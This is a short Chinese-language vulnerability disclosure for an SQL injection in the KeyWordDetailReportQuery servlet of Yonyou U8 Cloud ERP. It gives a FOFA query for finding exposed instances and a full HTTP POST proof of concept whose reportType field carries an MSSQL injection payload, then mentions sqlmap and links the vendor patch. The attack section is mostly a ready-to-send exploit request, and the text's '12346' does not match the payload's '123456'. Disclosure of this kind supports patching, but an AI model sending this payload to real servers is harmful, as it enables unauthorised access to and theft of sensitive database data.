产品简介
用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。
漏洞概述
用友U8 Cloud KeyWordDetailReportQuery接口处存在 sql漏洞,攻击者可通过该漏洞获取数据库中的敏感信息。
指纹识别
fofa:
app="用友-U8-Cloud"
漏洞利用
poc:
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 207
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
SL-CE-SUID: 29
{"reportType": "' AND 2780 IN (select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) AND 'njGF'='njGF", "usercode": "18701014496", "keyword": [{"keywordPk": "1", "keywordValue": "1", "keywordIndex": 1}]}
查询12346的md5值
sqlmap验证
修复建议
用友安全中心已经发布相关补丁
https://security.yonyou.com/#/patchInfo?identifier=f3fd4862ca2f45b3803ac48df08ace98
【江湖传闻多半名不符实,赢的人显威风,输的人爱面子,难免夸大些。】